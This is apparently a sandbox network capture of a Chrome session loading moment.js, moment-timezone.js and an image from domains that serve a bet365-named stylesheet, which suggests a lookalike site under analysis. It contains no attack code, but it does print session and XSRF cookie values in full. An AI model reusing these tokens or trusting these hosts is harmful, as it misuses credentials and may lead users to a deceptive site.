                                                      2025-01-12 23:47:49 UTC4096INData Raw: 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 5f 6c 6f 6e 67 4d 6f 6e 74 68 73 50 61 72 73 65 5b 69 5d 20 3d 20 74 68 69 73 2e 6d 6f 6e 74 68 73 28 6d 6f 6d 2c 20 27 27 29 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 69 66 20 28 73 74 72 69 63 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 6f 72 6d 61 74 20 3d 3d 3d 20 27 4d 4d 4d 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 69 20 3d 20 69 6e 64 65 78 4f 66 24 31 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 73 68 6f 72 74 4d 6f 6e 74 68 73 50 61 72 73 65 2c 20 6c 6c 63 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 69 20 21 3d 3d 20 2d 31 20 3f 20 69 69 20 3a 20 6e 75 6c 6c
                                                      Data Ascii: this._longMonthsParse[i] = this.months(mom, '').toLocaleLowerCase(); } } if (strict) { if (format === 'MMM') { ii = indexOf$1.call(this._shortMonthsParse, llc); return ii !== -1 ? ii : null
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 75 6e 63 74 69 6f 6e 20 6d 6f 6e 74 68 73 52 65 67 65 78 20 28 69 73 53 74 72 69 63 74 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 74 68 69 73 2e 5f 6d 6f 6e 74 68 73 50 61 72 73 65 45 78 61 63 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 68 61 73 4f 77 6e 50 72 6f 70 28 74 68 69 73 2c 20 27 5f 6d 6f 6e 74 68 73 52 65 67 65 78 27 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6d 70 75 74 65 4d 6f 6e 74 68 73 50 61 72 73 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 73 53 74 72 69 63 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 6f 6e 74 68 73 53 74 72 69 63 74 52 65 67 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 20 65
                                                      Data Ascii: unction monthsRegex (isStrict) { if (this._monthsParseExact) { if (!hasOwnProp(this, '_monthsRegex')) { computeMonthsParse.call(this); } if (isStrict) { return this._monthsStrictRegex; } e
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 75 72 6e 20 64 61 74 65 3b 0d 0a 7d 0d 0a 0d 0a 2f 2f 20 73 74 61 72 74 2d 6f 66 2d 66 69 72 73 74 2d 77 65 65 6b 20 2d 20 73 74 61 72 74 2d 6f 66 2d 79 65 61 72 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 69 72 73 74 57 65 65 6b 4f 66 66 73 65 74 28 79 65 61 72 2c 20 64 6f 77 2c 20 64 6f 79 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 2f 2f 20 66 69 72 73 74 2d 77 65 65 6b 20 64 61 79 20 2d 2d 20 77 68 69 63 68 20 6a 61 6e 75 61 72 79 20 69 73 20 61 6c 77 61 79 73 20 69 6e 20 74 68 65 20 66 69 72 73 74 20 77 65 65 6b 20 28 34 20 66 6f 72 20 69 73 6f 2c 20 31 20 66 6f 72 20 6f 74 68 65 72 29 0d 0a 20 20 20 20 20 20 20 20 66 77 64 20 3d 20 37 20 2b 20 64 6f 77 20 2d 20 64 6f 79 2c 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 66 69 72 73 74 2d 77 65 65 6b 20 64 61 79 20 6c 6f
                                                      Data Ascii: urn date;}// start-of-first-week - start-of-yearfunction firstWeekOffset(year, dow, doy) { var // first-week day -- which january is always in the first week (4 for iso, 1 for other) fwd = 7 + dow - doy, // first-week day lo
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 6e 28 27 64 27 2c 20 20 20 20 6d 61 74 63 68 31 74 6f 32 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 65 27 2c 20 20 20 20 6d 61 74 63 68 31 74 6f 32 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 45 27 2c 20 20 20 20 6d 61 74 63 68 31 74 6f 32 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 64 64 27 2c 20 20 20 66 75 6e 63 74 69 6f 6e 20 28 69 73 53 74 72 69 63 74 2c 20 6c 6f 63 61 6c 65 29 20 7b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 6c 6f 63 61 6c 65 2e 77 65 65 6b 64 61 79 73 4d 69 6e 52 65 67 65 78 28 69 73 53 74 72 69 63 74 29 3b 0d 0a 7d 29 3b 0d 0a 61 64 64 52 65 67 65 78 54 6f 6b 65 6e 28 27 64 64 64 27 2c 20 20 20 66 75 6e 63 74 69 6f 6e 20 28 69 73 53 74 72 69 63 74 2c 20 6c 6f 63 61 6c 65 29 20 7b 0d 0a 20 20 20
                                                      Data Ascii: n('d', match1to2);addRegexToken('e', match1to2);addRegexToken('E', match1to2);addRegexToken('dd', function (isStrict, locale) { return locale.weekdaysMinRegex(isStrict);});addRegexToken('ddd', function (isStrict, locale) {


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.44979520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:49 UTC648OUTGET /plus/js/custom/moment-timezone.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 196335
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-2feef"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3776INData Raw: 2f 2f 21 20 6d 6f 6d 65 6e 74 2d 74 69 6d 65 7a 6f 6e 65 2e 6a 73 0d 0a 2f 2f 21 20 76 65 72 73 69 6f 6e 20 3a 20 30 2e 35 2e 31 30 0d 0a 2f 2f 21 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0d 0a 2f 2f 21 20 6c 69 63 65 6e 73 65 20 3a 20 4d 49 54 0d 0a 2f 2f 21 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 6f 6d 65 6e 74 2f 6d 6f 6d 65 6e 74 2d 74 69 6d 65 7a 6f 6e 65 0d 0a 0d 0a 28 66 75 6e 63 74 69 6f 6e 20 28 72 6f 6f 74 2c 20 66 61 63 74 6f 72 79 29 20 7b 0d 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0d 0a 0d 0a 09 2f 2a 67 6c 6f 62 61 6c 20 64 65 66 69 6e 65 2a 2f 0d 0a 09 69 66 20 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75
                                                      Data Ascii: //! moment-timezone.js//! version : 0.5.10//! Copyright (c) JS Foundation and other contributors//! license : MIT//! github.com/moment/moment-timezone(function (root, factory) {"use strict";/*global define*/if (typeof define === 'fu
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 0a 09 09 09 09 69 3b 0d 0a 0d 0a 09 09 09 66 6f 72 20 28 69 20 3d 20 30 3b 20 69 20 3c 20 75 6e 74 69 6c 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 09 09 09 09 69 66 20 28 74 61 72 67 65 74 20 3c 20 75 6e 74 69 6c 73 5b 69 5d 29 20 7b 0d 0a 09 09 09 09 09 72 65 74 75 72 6e 20 69 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 7d 0d 0a 09 09 7d 2c 0d 0a 0d 0a 09 09 70 61 72 73 65 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 74 69 6d 65 73 74 61 6d 70 29 20 7b 0d 0a 09 09 09 76 61 72 20 74 61 72 67 65 74 20 20 3d 20 2b 74 69 6d 65 73 74 61 6d 70 2c 0d 0a 09 09 09 09 6f 66 66 73 65 74 73 20 3d 20 74 68 69 73 2e 6f 66 66 73 65 74 73 2c 0d 0a 09 09 09 09 75 6e 74 69 6c 73 20 20 3d 20 74 68 69 73 2e 75 6e 74 69 6c 73 2c 0d 0a 09 09 09 09 6d 61 78 20 20 20 20 20 3d
                                                      Data Ascii: i;for (i = 0; i < untils.length; i++) {if (target < untils[i]) {return i;}}},parse : function (timestamp) {var target = +timestamp,offsets = this.offsets,untils = this.untils,max =
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 0a 09 09 09 69 66 20 28 69 6e 74 6c 4e 61 6d 65 29 7b 0d 0a 09 09 09 09 76 61 72 20 6e 61 6d 65 20 3d 20 6e 61 6d 65 73 5b 6e 6f 72 6d 61 6c 69 7a 65 4e 61 6d 65 28 69 6e 74 6c 4e 61 6d 65 29 5d 3b 0d 0a 09 09 09 09 69 66 20 28 6e 61 6d 65 29 20 7b 0d 0a 09 09 09 09 09 72 65 74 75 72 6e 20 6e 61 6d 65 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 09 6c 6f 67 45 72 72 6f 72 28 22 4d 6f 6d 65 6e 74 20 54 69 6d 65 7a 6f 6e 65 20 66 6f 75 6e 64 20 22 20 2b 20 69 6e 74 6c 4e 61 6d 65 20 2b 20 22 20 66 72 6f 6d 20 74 68 65 20 49 6e 74 6c 20 61 70 69 2c 20 62 75 74 20 64 69 64 20 6e 6f 74 20 68 61 76 65 20 74 68 61 74 20 64 61 74 61 20 6c 6f 61 64 65 64 2e 22 29 3b 0d 0a 09 09 09 7d 0d 0a 09 09 7d 20 63 61 74 63 68 20 28 65 29 20 7b 0d 0a 09 09 09 2f 2f 20 49 6e 74 6c
                                                      Data Ascii: if (intlName){var name = names[normalizeName(intlName)];if (name) {return name;}logError("Moment Timezone found " + intlName + " from the Intl api, but did not have that data loaded.");}} catch (e) {// Intl
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 2e 7a 6f 6e 65 45 78 69 73 74 73 20 20 20 3d 20 7a 6f 6e 65 45 78 69 73 74 73 3b 20 2f 2f 20 64 65 70 72 65 63 61 74 65 64 20 69 6e 20 30 2e 31 2e 30 0d 0a 09 74 7a 2e 67 75 65 73 73 20 20 20 20 20 20 20 20 3d 20 67 75 65 73 73 3b 0d 0a 09 74 7a 2e 6e 61 6d 65 73 20 20 20 20 20 20 20 20 3d 20 67 65 74 4e 61 6d 65 73 3b 0d 0a 09 74 7a 2e 5a 6f 6e 65 20 20 20 20 20 20 20 20 20 3d 20 5a 6f 6e 65 3b 0d 0a 09 74 7a 2e 75 6e 70 61 63 6b 20 20 20 20 20 20 20 3d 20 75 6e 70 61 63 6b 3b 0d 0a 09 74 7a 2e 75 6e 70 61 63 6b 42 61 73 65 36 30 20 3d 20 75 6e 70 61 63 6b 42 61 73 65 36 30 3b 0d 0a 09 74 7a 2e 6e 65 65 64 73 4f 66 66 73 65 74 20 20 3d 20 6e 65 65 64 73 4f 66 66 73 65 74 3b 0d 0a 09 74 7a 2e 6d 6f 76 65 49 6e 76 61 6c 69 64 46 6f 72 77 61 72 64 20 20 20
                                                      Data Ascii: .zoneExists = zoneExists; // deprecated in 0.1.0tz.guess = guess;tz.names = getNames;tz.Zone = Zone;tz.unpack = unpack;tz.unpackBase60 = unpackBase60;tz.needsOffset = needsOffset;tz.moveInvalidForward
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 31 77 70 30 20 4f 6e 30 20 31 7a 64 30 20 4c 7a 30 20 31 45 4e 30 20 46 62 30 20 63 31 30 20 38 6e 30 20 38 4e 64 30 20 67 4c 30 20 65 31 30 20 6d 6e 30 7c 31 35 65 36 22 2c 0d 0a 09 09 09 22 41 66 72 69 63 61 2f 43 61 73 61 62 6c 61 6e 63 61 7c 4c 4d 54 20 57 45 54 20 57 45 53 54 20 43 45 54 7c 75 2e 6b 20 30 20 2d 31 30 20 2d 31 30 7c 30 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 33 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 7c 2d 32 67 4d 6e 74 2e 45 20 31 33 30 4c 74 2e 45 20 72 62 30 20 44 64 30 20 64 56 62 30 20 62 36 70 30 20 54 58 30 20 45 6f
                                                      Data Ascii: 1wp0 On0 1zd0 Lz0 1EN0 Fb0 c10 8n0 8Nd0 gL0 e10 mn0|15e6","Africa/Casablanca|LMT WET WEST CET|u.k 0 -10 -10|0121212121212121213121212121212121212121212121212121212121212121212121212121212121212121212121212121|-2gMnt.E 130Lt.E rb0 Dd0 dVb0 b6p0 TX0 Eo
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 31 63 4e 30 20 31 63 4c 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20
                                                      Data Ascii: 1cN0 1cL0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 14p0 1lb0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 14p0 1lb0 14p0 1lb0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 14p0 1lb0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 4b 6e 48 2e 63 20 4d 6e 30 20 31 69 4e 30 20 54 62 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4d 6e 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4d 6e 30 20 4d 4e 30 20 32 6a 7a 30 20 4d 4e 30 20 34 6c 58 30 20 75 31 30 20 35 4c 62 30 20 31 70 42 30 20 46 6e 7a 30 20 75 31 30 20 75 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 31 37 7a 30 20 31 63 4e 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 61 73 6e 30 20 44 62 30 20 7a 76 64 30 20 42 7a 30 20 31 74 42 30 20 54 58 30 20 31 75 32 30 20 53 4c 30 20 31 76 64 30 20 54 62 30 20 31 77 70 30 20 54 57 30 20 67 30 70 30 20 31 30 4d 30 20 61 67
                                                      Data Ascii: KnH.c Mn0 1iN0 Tb0 1C10 LX0 1C10 LX0 1C10 LX0 1C10 Mn0 1C10 LX0 1C10 LX0 1C10 LX0 1C10 Mn0 MN0 2jz0 MN0 4lX0 u10 5Lb0 1pB0 Fnz0 u10 uL0 1vd0 SL0 1vd0 SL0 1vd0 17z0 1cN0 1fz0 1cN0 1cL0 1cN0 asn0 Db0 zvd0 Bz0 1tB0 TX0 1u20 SL0 1vd0 Tb0 1wp0 TW0 g0p0 10M0 ag
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 7a 30 20 31 45 4e 30 20 4c 7a 30 20 31 43 31 30 20 49 4c 30 20 31 48 42 30 20 44 62 30 20 31 48 42 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4c 7a 30 20 31 7a 64 30 20 52 62 30 20 31 77 4e 30 20 57 6e 30 20 31 74 42 30 20 52 62 30 20 31 74 42 30 20 57 4c 30 20 31 74 42 30 20 52 62 30 20 31 7a 64 30 20 4f 6e 30 20 31 48 42 30 20 46 58 30 20 6c 35 42 30 20 52 62 30 7c 32 37 65 35 22 2c 0d 0a 09 09 09 22 41 6d 65 72 69 63 61 2f 42 61 68 69 61 5f 42 61 6e 64 65 72 61 73 7c 4c 4d 54 20 4d 53 54 20 43 53 54 20 50 53 54 20 4d 44 54 20 43 44 54 7c 37 31 20 37 30 20 36 30 20 38 30 20 36 30 20 35 30 7c 30 31 32 31 32 31 32 31 33 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 35 32 35 32 35 32 35 32 35 32 35
                                                      Data Ascii: z0 1EN0 Lz0 1C10 IL0 1HB0 Db0 1HB0 On0 1zd0 On0 1zd0 Lz0 1zd0 Rb0 1wN0 Wn0 1tB0 Rb0 1tB0 WL0 1tB0 Rb0 1zd0 On0 1HB0 FX0 l5B0 Rb0|27e5","America/Bahia_Banderas|LMT MST CST PST MDT CDT|71 70 60 80 60 50|0121212131414141414141414141414141414152525252525
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 4f 6e 30 20 31 48 42 30 20 46 58 30 20 31 43 31 30 20 4c 7a 30 20 31 49 70 30 20 48 58 30 20 31 7a 64 30 20 4f 6e 30 20 31 48 42 30 20 49 4c 30 20 31 77 70 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 52 62 30 20 31 7a 64 30 20 4c 7a 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 52 62 30 20 31 77 70 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30
                                                      Data Ascii: On0 1HB0 FX0 1C10 Lz0 1Ip0 HX0 1zd0 On0 1HB0 IL0 1wp0 On0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 Rb0 1zd0 Lz0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 On0 1zd0 On0 1C10 Lz0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 Rb0 1wp0 On0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 On0 1zd0 On0 1C10 Lz0
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 4d 30 20 44 43 30 7c 38 22 2c 0d 0a 09 09 09 22 41 6d 65 72 69 63 61 2f 44 61 77 73 6f 6e 7c 59 53 54 20 59 44 54 20 59 57 54 20 59 50 54 20 59 44 44 54 20 50 53 54 20 50 44 54 7c 39 30 20 38 30 20 38 30 20 38 30 20 37 30 20 38 30 20 37 30 7c 30 31 30 31 30 32 33 30 34 30 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 7c 2d 32 35 54 4e 30 20 31 69 6e 30 20 31 6f 31 30 20 31 33 56 30 20 53 65 72 30 20 38 78 30 30 20 69 7a 30 20 4c 43 4c 30 20 31 66 41 30 20
                                                      Data Ascii: M0 DC0|8","America/Dawson|YST YDT YWT YPT YDDT PST PDT|90 80 80 80 70 80 70|0101023040565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565|-25TN0 1in0 1o10 13V0 Ser0 8x00 iz0 LCL0 1fA0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.44979620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:49 UTC663OUTGET /images_plus/header/common/spiler.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/common/bet365_style.css?ver=1684314915
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC354INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 1002
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 05:05:00 GMT
                                                      ETag: "5fc7207c-3ea"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC1002INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 1c 08 02 00 00 00 c4 08 f9 98 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 69 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20
                                                      Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<iiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.449797154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:49 UTC955OUTGET /gdcode_1736725656 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IjFzNTJBYWlhUVE2cm9IaVFueENOV2c9PSIsInZhbHVlIjoiYUc5ZDZYYWI2MHNkaERZRzlGWmYzcDI5RU1Tak5xZkZhbmJ2aERFSVo2WHFjaVFwWENHVGtUR2c3TDVJRUord3lwVWtNUjR0cmhMcnhqS0VlYVkxOWc9PSIsIm1hYyI6IjlkOTRmMGQyZTFjMjk0OWZjN2MxNWE4NDEzN2RmN2QxZWRkOTRjYjc5NmI0OGY0MWJkMzk4NjVkOTczNGMyMzIifQ%3D%3D; vanguard_session=eyJpdiI6InFxdUZ6ek0zT2J2bzY4VWt6WXJhVUE9PSIsInZhbHVlIjoiS1wvcUtlNnpZRkgwcUUwUm41RUdOTHo1aTNNeWZZR3lDQUtpNDhXeXlcLzdDMks2QmhDQ1wvbStXSEkxVUtzZFA3OUxRbFFxM1dER3RkemFlY2VGVlJVRkE9PSIsIm1hYyI6ImM3Zjg4MzBlNGE0OGJmZTQ0OTM5ZWQzODRlOGQxNjJhMmQwMmQ4NWZhODI5YWE4MGRkMGM0ZjI0OWQ2MWE3YzUifQ%3D%3D
                                                      2025-01-12 23:47:50 UTC1133INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: image/jpeg
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: max-age=315360000
                                                      Pragma: no-cache
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IldSSldaZGRpTDFYdU5pR2hhSzlEVnc9PSIsInZhbHVlIjoiYUJBaDZZUXZOOE8xSmdMOEYxdjRITXE1QStBQTJOTENhQ0FuRHVoZ2d2ZHZPR3I5cFRSbHFzR1F2aWhVYjlZM1ZTYU5hcjdCXC8wMkRQdEdMUENvQ3dBPT0iLCJtYWMiOiIyYjdmMTk0NTEwNzZmMjI0MmE4YWVjNWFiMjgxZjViYWQ1NjFiMjBjY2JmMWM0ZTAyZGI0NGY0OTgyYzBhN2JhIn0%3D; expires=Mon, 13-Jan-2025 01:47:49 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      Set-Cookie: vanguard_session=eyJpdiI6Ikd5ZjJoSXNaODRKTER3Y2lLZGswRlE9PSIsInZhbHVlIjoiUU83K2RQdHp0bGZuR1JlV3JSN1NLbGZyZHYyNlJKXC9peFdmcHZxZVpFVU0xb3FRTnhlaDRrZXl1ZzhOMnhvamRITTU3QlJGWGo2YXFBRmVoWGROVnVBPT0iLCJtYWMiOiIwNThjYjFiZWZjYmEwZTZmNmY3NTIyOTY5ZWViZGViZTMwY2NhYmU2ZWVkOWY3MWJkMmFiODg2NTEwYjQyMTBjIn0%3D; expires=Mon, 13-Jan-2025 01:47:49 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
